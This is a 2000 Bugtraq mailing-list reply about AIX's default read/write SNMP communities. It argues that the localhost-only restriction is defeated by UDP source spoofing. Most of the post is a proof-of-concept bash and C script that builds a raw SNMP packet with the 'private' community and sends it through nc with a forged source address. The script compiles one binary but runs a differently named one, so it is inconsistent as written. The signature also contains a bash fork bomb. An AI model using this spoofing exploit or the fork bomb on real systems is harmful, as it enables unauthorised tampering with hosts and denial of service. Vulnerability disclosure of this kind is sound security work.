Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: AIX SNMP Defaults

From: lcamtuf () DIONE IDS PL (Michal Zalewski)
Date: Thu, 17 Feb 2000 11:28:54 +0100

On Tue, 15 Feb 2000, harikiri wrote:


It appears that on the above releases of AIX, the SNMP daemon is
enabled by default and two community names are enabled with read/write
privileges. The community names are "private" and "system", but are
only allowed from localhost connections. Nevertheless, a local user
may install an SNMP client, and modify sensitive variables.


SNMP requests with no authentication except for source-IP comparsion, are
spoofable.

--snip--
#!/bin/bash

cat >/tmp/spoof1.c <<_EOF_
char
private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
"\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main() {  write(1,private,sizeof(private)); }
_EOF_

gcc -o /tmp/spoof1 /tmp/spoof1.c

/tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161
--snip--

UDP blind spoofing, nothing easier.

_______________________________________________________
Michal Zalewski * [lcamtuf () ags pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
Previous By Date Next
Previous By Thread Next

Current thread: